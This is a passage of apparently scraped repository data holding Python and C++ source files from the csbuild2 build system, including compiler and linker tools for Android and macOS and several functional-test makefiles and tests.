\"component\"\n\n\t\t\tprojectsInGraph.append(buildProj)\n\n\t\t\tbuilder += '\\t{0} [shape=\"{1}\" color=\"{2}\" style=\"filled\" fillcolor=\"{2}30\"];\\n'.format(buildProj.name.replace(\"-\", \"_\"), shape, color)\n\t\t\tclass _shared:\n\t\t\t\ttopLevelDependencies = set(buildProj.dependencies)\n\t\t\tdef _recurseAndRemove(deps):\n\t\t\t\tfor dep in deps:\n\t\t\t\t\tfor nextDep in dep.dependencies:\n\t\t\t\t\t\tif nextDep in _shared.topLevelDependencies:\n\t\t\t\t\t\t\t_shared.topLevelDependencies.remove(nextDep)\n\t\t\t\t\t_recurseAndRemove(dep.dependencies)\n\t\t\t_recurseAndRemove(buildProj.dependencies)\n\n\t\t\tdist = 0\n\t\t\tfor otherProj in _shared.topLevelDependencies:\n\t\t\t\tif otherProj.projectType == csbuild.ProjectType.Stub and not args.dg_stubs:\n\t\t\t\t\tcontinue\n\t\t\t\tbuilder += '\\t{} -> {} [color=\"{}\";];\\n'.format(buildProj.name.replace(\"-\", \"_\"), otherProj.name, color)\n\t\t\t\tdist += 1\n\n\t\tapplications = [proj for proj in projectsInGraph if proj.projectType == csbuild.ProjectType.Application]\n\t\tbuilder += \"\\t{{ rank=same; {} }}\\n\".format(\"; \".join([proj.name.replace(\"-\", \"_\") for proj in applications]))\n\n\t\tbuilder += \"}\"\n\t\twith open(\"depends.gv\", \"w\") as f:\n\t\t\tf.write(builder)\n\t\tlog.Build(\"Wrote depends.gv\")\n\t\ttry:\n\t\t\t# pylint: disable=import-error\n\t\t\tfrom graphviz import Digraph\n\t\texcept:\n\t\t\tlog.Warn(\"graphviz library not found. You can open depends.gv with graphviz or a similar dot viewer to view the graph, or install graphviz with pip install graphviz.\")\n\t\telse:\n\t\t\tgraph = Digraph(comment=\"CSBuild Dependency Graph\", format=\"png\", engine=args.dg_type, filename=\"depends\")\n\t\t\tDigraph.source=property(lambda self: builder)\n\t\t\tgraph.render(\"depends.gv\", view=True)\n\t\t\tlog.Build(\"Wrote depends.png\")\n\t\treturn\n\n\tif not args.clean or args.rebuild:\n\t\twith perf_timer.PerfTimer(\"Project setup\"):\n\t\t\t#Now all dependencies have been resolved, so let toolchains do their post-resolution setup\n\t\t\tfor proj in projectBuildList:\n\t\t\t\tfor tool in proj.toolchain.GetAllTools():\n\t\t\t\t\tproj.toolchain.Tool(tool).SetupForProject(proj)\n\n\tshared_globals.projectBuildList = projectBuildList\n\n\ttotaltime = time.time() - preparationStart\n\tlog.Build(\"Build preparation took {}\".format(FormatTime(totaltime)))\n\n\tif args.clean or args.rebuild:\n\t\t_clean(projectBuildList, args.rebuild)\n\n\tif not args.clean or args.rebuild:\n\t\tshared_globals.commandOutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\tshared_globals.commandOutputThread.start()\n\n\t\tlog.Build(\"Executing build start hooks\")\n\t\tfor hook in shared_globals.buildStartedHooks:\n\t\t\thook(projectBuildList)\n\n\t\tfailures = _build(args.jobs, projectBuildList)\n\n\t\tlog.Build(\"Executing build completion hooks\")\n\t\tfor hook in shared_globals.buildFinishedHooks:\n\t\t\thook(projectBuildList)\n\n\twith perf_timer.PerfTimer(\"Waiting on logging to shut down\"):\n\t\tlog.StopLogThread()\n\n\tshared_globals.settings.Persist()\n\n\ttotaltime = time.time() - preparationStart\n\tlog.Build(\"Total execution took {}\".format(FormatTime(totaltime)))\n\tsystem.Exit(failures)\n" }, { "alpha_fraction": 0.7086859941482544, "alphanum_fraction": 0.7102450132369995, "avg_line_length": 36.10743713378906, "blob_id": "e372877a3b60cdebb582a3d712e6b8a8086eb75c", "content_id": "7aaec9ff43a73a642294ee959c13ddc09a52d501", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4490, "license_type": "no_license", "max_line_length": 146, "num_lines": 121, "path": "/csbuild/tools/cpp_compilers/android_gcc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_gcc_cpp_compiler\n\t:synopsis: Android GCC compiler tool for C++.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .gcc_cpp_compiler import GccCppCompiler\nfrom ..common.android_tool_base import AndroidToolBase\nfrom ..._build.input_file import InputFile\n\nclass AndroidGccCppCompiler(GccCppCompiler, AndroidToolBase):\n\t\"\"\"\n\tAndroid GCC c++ compiler implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\tdef __init__(self, projectSettings):\n\t\tGccCppCompiler.__init__(self, projectSettings)\n\t\tAndroidToolBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccCppCompiler.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\t\t# Applications should automatically add the default native app glue source file, but only when told to do so.\n\t\tif project.projectType == csbuild.ProjectType.Application and self._androidNativeAppGlue:\n\t\t\tnativeAppGlueSourcePath = os.path.join(self._androidInfo.nativeAppGluPath, \"android_native_app_glue.c\")\n\t\t\tassert os.access(nativeAppGlueSourcePath, os.F_OK), \"Android native app glue source file not found at path: {}\".format(nativeAppGlueSourcePath)\n\n\t\t\t# Add it directly to the project's list of input files.\n\t\t\tproject.inputFiles[\".c\"].add(InputFile(nativeAppGlueSourcePath))\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tassert self._androidInfo.gccPath, \"No Android gcc executable found for architecture: {}\".format(project.architectureName)\n\t\tassert self._androidInfo.gppPath, \"No Android g++ executable found for architecture: {}\".format(project.architectureName)\n\t\treturn self._androidInfo.gppPath if isCpp else self._androidInfo.gccPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = GccCppCompiler._getDefaultArgs(self, project)\n\t\tdefaultAndroidArgs = self._getDefaultCompilerArgs()\n\t\treturn baseArgs + defaultAndroidArgs + [\n\t\t\t\"-funswitch-loops\",\n\t\t\t\"-finline-limit=100\",\n\t\t]\n\n\tdef _getPreprocessorArgs(self):\n\t\targs = [\n\t\t\t\"-D__ANDROID_API__={}\".format(self._androidTargetSdkVersion),\n\t\t\t\"-DANDROID_NDK\",\n\t\t\t\"-DANDROID\",\n\t\t\t\"-D__ANDROID__\",\n\t\t]\n\t\treturn args + GccCppCompiler._getPreprocessorArgs(self)\n\n\tdef _getArchitectureArgs(self, project):\n\t\tbuildArchName = self._getBuildArchName(project.architectureName)\n\t\treturn [\"-march={}\".format(buildArchName)] if buildArchName else []\n\n\tdef _getSystemArgs(self, project, isCpp):\n\t\targs = []\n\n\t\tif isCpp:\n\t\t\t# Add each include path for the selected version of STL.\n\t\t\tfor path in self._androidInfo.stlIncludePaths:\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-isystem\",\n\t\t\t\t\tpath,\n\t\t\t\t])\n\n\t\t# Add the sysroot include paths.\n\t\tfor path in self._androidInfo.systemIncludePaths:\n\t\t\targs.extend([\n\t\t\t\t\"-isystem\",\n\t\t\t\tpath,\n\t\t\t])\n\n\t\tif self._androidNativeAppGlue:\n\t\t\targs.extend([\n\t\t\t\t\"-isystem\",\n\t\t\t\tself._androidInfo.nativeAppGluPath,\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.8225806355476379, "alphanum_fraction": 0.8225806355476379, "avg_line_length": 61, "blob_id": "9147c96295a6cc844cce154b531702cda407ade2", "content_id": "5b83a5e3dd566aadf611c05f1bc98b4068027fb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 62, "license_type": "no_license", "max_line_length": 61, "num_lines": 1, "path": "/functional_tests/explicit_sources_test/project/source/bad.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "This file is intentionally broken and should not be compiled.\n" }, { "alpha_fraction": 0.6875126361846924, "alphanum_fraction": 0.6887269616127014, "avg_line_length": 29.5, "blob_id": "1a7237cf8c7b5a36b93e1e9c09a6cb09c4fe4cab", "content_id": "1b7a278e7357a663bef9fd9c6769ff0a56cd0c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4941, "license_type": "no_license", "max_line_length": 117, "num_lines": 162, "path": "/csbuild/tools/linkers/mac_os_clang_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: mac_os_clang_linker\n\t:synopsis: Clang linker tool for the macOS platform.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .clang_linker import ClangLinker\n\nfrom ..common import FindLibraries\nfrom ..common.apple_tool_base import MacOsToolBase\n\nclass MacOsClangLinker(MacOsToolBase, ClangLinker):\n\t\"\"\"\n\tClang compiler implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Darwin\" }\n\toutputFiles = { \"\", \".a\", \".dylib\" }\n\tcrossProjectDependencies = { \".a\", \".dylib\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMacOsToolBase.__init__(self, projectSettings)\n\t\tClangLinker.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tMacOsToolBase.SetupForProject(self, project)\n\t\tClangLinker.SetupForProject(self, project)\n\n\tdef _findLibraries(self, project, libs):\n\t\tsysLibDirs = [\n\t\t\t\"/usr/local/lib\",\n\t\t\t\"/usr/lib\",\n\t\t]\n\t\tallLibraryDirectories = list(self._libraryDirectories) + sysLibDirs\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".dylib\", \".so\", \".a\"])\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = ClangLinker._getDefaultArgs(self, project)\n\n\t\t# Get the special library build flag.\n\t\tlibraryBuildArg = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"-dynamiclib\",\n\t\t}.get(project.projectType, \"\")\n\t\targs.append(libraryBuildArg)\n\n\t\t# Set the system and SDK properties.\n\t\targs.extend([\n\t\t\t\"-mmacosx-version-min={}\".format(self._macOsVersionMin),\n\t\t\t\"-isysroot\",\n\t\t\tself._appleToolInfo.defaultMacOsSdkPath,\n\t\t])\n\n\t\treturn args\n\n\tdef _rpathStartsWithVariable(self, rpath):\n\t\treturn rpath.startswith(\"@\")\n\n\tdef _getRpathOriginVariable(self):\n\t\t# TODO: Eventually need a way to switch the default origin variable between @executable_path and @loader_path\n\t\treturn \"@executable_path\"\n\n\tdef _getRpathArgs(self, project):\n\t\targs = []\n\n\t\tif project.projectType == csbuild.ProjectType.Application:\n\t\t\targs.extend([\n\t\t\t\t\"-Xlinker\", \"-rpath\",\n\t\t\t\t\"-Xlinker\", self._getRpathOriginVariable(),\n\t\t\t])\n\n\t\t\trpaths = set()\n\t\t\toutDir = os.path.dirname(self._getOutputFiles(project)[0])\n\n\t\t\tif project.autoResolveRpaths:\n\t\t\t\t# Add RPATH arguments for each linked library path.\n\t\t\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\t\t\tlibDir = os.path.dirname(lib)\n\t\t\t\t\trpath = self._resolveRpath(outDir, libDir)\n\n\t\t\t\t\tif rpath:\n\t\t\t\t\t\trpaths.add(rpath)\n\n\t\t\t# Add RPATH arguments for each path specified in the makefile.\n\t\t\tfor path in self._rpathDirectories:\n\t\t\t\tpath = self._resolveRpath(outDir, path)\n\n\t\t\t\tif path:\n\t\t\t\t\trpaths.add(path)\n\n\t\t\t# Add each RPATH to the argument list.\n\t\t\tfor path in sorted(rpaths):\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-Xlinker\", \"-rpath\",\n\t\t\t\t\t\"-Xlinker\", path,\n\t\t\t\t])\n\n\t\telif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutFile = os.path.basename(self._getOutputFiles(project)[0])\n\t\t\targs.extend([\n\t\t\t\t\"-install_name\",\n\t\t\t\t\"@rpath/{}\".format(outFile),\n\t\t\t])\n\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\tlibArgs = list(self._actualLibraryLocations.values())\n\t\tframeworkArgs = [\"-F{}\".format(path) for path in self._frameworkDirectories]\n\t\tfor framework in self._frameworks:\n\t\t\tframeworkArgs.extend([\"-framework\", framework])\n\n\t\treturn frameworkArgs + libArgs\n\n\tdef _getStartGroupArgs(self):\n\t\treturn []\n\n\tdef _getEndGroupArgs(self):\n\t\treturn []\n\n\tdef _useResponseFileWithArchiver(self):\n\t\treturn False\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dylib\",\n\t\t}.get(projectType, None)\n\n\t\tif outputExt is None:\n\t\t\toutputExt = ClangLinker._getOutputExtension(self, projectType)\n\n\t\treturn outputExt\n" }, { "alpha_fraction": 0.6836695671081543, "alphanum_fraction": 0.6851922273635864, "avg_line_length": 37.07246398925781, "blob_id": "51424a4d27ed9a2b738e0e53a757a83fbe7dd45c", "content_id": "69f027b82fe5c8899d1d78883a7386a349fd0e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2627, "license_type": "no_license", "max_line_length": 117, "num_lines": 69, "path": "/csbuild/tools/cpp_compilers/mac_os_clang_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: mac_os_clang_cpp_compiler\n\t:synopsis: Clang compiler tool for C++ specifically targeting macOS.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom .clang_cpp_compiler import ClangCppCompiler\n\nfrom ..common.apple_tool_base import MacOsToolBase\n\nclass MacOsClangCppCompiler(MacOsToolBase, ClangCppCompiler):\n\t\"\"\"\n\tClang compiler for macOS implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Darwin\" }\n\tinputFiles={ \".cpp\", \".c\", \".cc\", \".cxx\", \".m\", \".mm\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMacOsToolBase.__init__(self, projectSettings)\n\t\tClangCppCompiler.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tMacOsToolBase.SetupForProject(self, project)\n\t\tClangCppCompiler.SetupForProject(self, project)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = ClangCppCompiler._getDefaultArgs(self, project)\n\n\t\t# Set the system and SDK properties.\n\t\targs.extend([\n\t\t\t\"-mmacosx-version-min={}\".format(self._macOsVersionMin),\n\t\t\t\"-isysroot\",\n\t\t\tself._appleToolInfo.defaultMacOsSdkPath,\n\t\t])\n\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = ClangCppCompiler._getIncludeDirectoryArgs(self)\n\t\targs.extend([\"-F{}\".format(d) for d in self._frameworkDirectories])\n\t\treturn args\n" }, { "alpha_fraction": 0.7383642196655273, "alphanum_fraction": 0.7428829669952393, "avg_line_length": 33.0461540222168, "blob_id": "f1b3ebab4b331cec00bff0dccbe009dda7a877c5", "content_id": "c9171f6af2c2be1fbdb4ac9773d12f98a749e23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 79, "num_lines": 65, "path": "/functional_tests/basic_functionality_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\n\nclass NullClass(Tool):\n\t\"\"\"Empty tool just to make things work.\"\"\"\n\tinputFiles = {\".foo\"}\n\toutputFiles = {\".bar\"}\n\tsupportedArchitectures=None\n\tinputFiles=None\n\toutputFiles={\"\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\treturn \"(no output)\"\n\ncsbuild.RegisterToolchain(\"msvc\", \"dummy\", NullClass)\ncsbuild.RegisterToolchain(\"gcc\", \"dummy\", NullClass)\n\nwith csbuild.Project(\"hello_world_2\", \"./\", [\"hello_world\"]):\n\twith csbuild.Target(\"debug\"):\n\t\tcsbuild.SetOutput(\"hello_world_2_debug\")\n\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_2\")\n\nwith csbuild.Project(\"hello_world_3\", \"./\", [\"hello_world\"]):\n\twith csbuild.Target(\"debug\"):\n\t\tcsbuild.SetOutput(\"hello_world_3_debug\")\n\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_3\")\n\nwith csbuild.Project(\"hello_world\", \"./\"):\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_release\")\n\n\tcsbuild.SetOutput(\"hello_world\")\n" }, { "alpha_fraction": 0.7383313775062561, "alphanum_fraction": 0.7406651377677917, "avg_line_length": 33.62626266479492, "blob_id": "2b1c259d122179a468f1a930bd0c4f637dd1d4cf", "content_id": "54a3c2ca2394399903e059a6289e9d65478597cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 125, "num_lines": 99, "path": "/functional_tests/project_dependency_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class\n\t\"\"\"\n\tsupportedArchitectures=None\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\tcrossProjectDependencies = {\".thirdlib\"}\n\toutputFiles = {\".thirdlib\", \".thirdapp\"}\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\n\t\tif inputProject.projectType == csbuild.ProjectType.Application:\n\t\t\tfor dep in inputProject.dependencies:\n\t\t\t\tlibFile = os.path.join(dep.outputDir, dep.outputName + \".thirdlib\")\n\t\t\t\twith open(libFile, \"r\") as f:\n\t\t\t\t\tvalue += int(f.read())\n\t\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".thirdapp\")\n\t\telse:\n\t\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".thirdlib\")\n\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", Doubler, Adder)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\tcsbuild.SetIntermediateDirectory(\"intermediate/FooIntermediate\")\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.StaticLibrary)\n\nwith csbuild.Project(\"TestProject2\", \".\", [\"TestProject\"]):\n\tcsbuild.SetIntermediateDirectory(\"intermediate/BarIntermediate\")\n\tcsbuild.SetOutput(\"Bar\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.7131295800209045, "alphanum_fraction": 0.7138912677764893, "avg_line_length": 39.08778762817383, "blob_id": "6006a11503f6a3a4d33b25189425ecc46894c737", "content_id": "03bdad76807d06f03dfc8d361e2446b0ace1475e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10503, "license_type": "no_license", "max_line_length": 121, "num_lines": 262, "path": "/functional_tests/basic_cpp_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of C++ tools\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild.tools.linkers.linker_base import LibraryError\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport platform\nimport subprocess\nimport time\n\ndef Touch(fname):\n\t\"\"\"\n\tTouch a file to update its modification time\n\t:param fname: Filename\n\t:type fname: str\n\t\"\"\"\n\twriteBit = 0x80\n\toldPermissions = os.stat(fname).st_mode\n\tisReadOnly = not oldPermissions & writeBit\n\tif isReadOnly:\n\t\tos.chmod(fname, oldPermissions | writeBit)\n\ttry:\n\t\twith open(fname, 'a'):\n\t\t\t# Mac has terrible filesystem time resolution, so we have to force a sleep\n\t\t\t# in order for changes to be picked up.\n\t\t\tif platform.system() == \"Darwin\":\n\t\t\t\ttime.sleep(1)\n\t\t\tos.utime(fname, None)\n\tfinally:\n\t\tif isReadOnly:\n\t\t\tos.chmod(fname, oldPermissions)\n\nclass BasicCppTest(FunctionalTest):\n\t\"\"\"Basic c++ test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"static/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"static/hello_world\"\n\t\toutDir = \"static\"\n\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--project=libhello\", \"--at\"])\n\n\t\twith open(\"libhello/libhello.cpp\", \"rb\") as f:\n\t\t\tdata = f.read()\n\t\tif b\"!!!\" in data:\n\t\t\t# Just in case the \"modify and rebuild library\" test fails to clean up after itself...\n\t\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\t\tf.write(data.replace(b\"!!!\", 